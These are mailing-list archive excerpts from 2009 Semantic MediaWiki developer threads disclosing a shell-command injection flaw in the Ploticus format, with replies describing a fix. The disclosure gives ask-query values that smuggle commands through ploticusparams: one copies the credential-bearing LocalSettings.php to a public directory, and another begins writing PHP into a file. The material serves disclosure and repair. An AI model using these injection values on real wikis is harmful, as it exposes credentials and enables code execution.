Re: [SMW-devel] Ploticus format security issues

2009-05-06 Thread Ryan Lane
Thanks for this.  As Markus mentioned, full disclosure may not have been the preferred route, but the fault is all mine as I contributed the Ploticus format. I'm currently working on a whitelisted, prefab-only version of SRF-Ploticus. Script mode will be totally disabled, but SMW users who

Re: [SMW-devel] Ploticus format security issues

2009-05-06 Thread Markus Krötzsch
On Mittwoch, 6. Mai 2009, Ryan Lane wrote: Thanks for this.  As Markus mentioned, full disclosure may not have been the preferred route, but the fault is all mine as I contributed the Ploticus format. I'm currently working on a whitelisted, prefab-only version of SRF-Ploticus. Script

[SMW-devel] Ploticus format security issues

2009-05-04 Thread Ryan Lane
In prefab mode, the user can pass arbitrary shell commands via ask; for example: {{#ask: [[Main_Page]] |?population |format=ploticus |ploticusparams=;cp LocalSettings.php images/LocalSettings.txt; }} {{#ask: [[Main_Page]] |?population |format=ploticus |ploticusparams=;echo ?php echo 'hello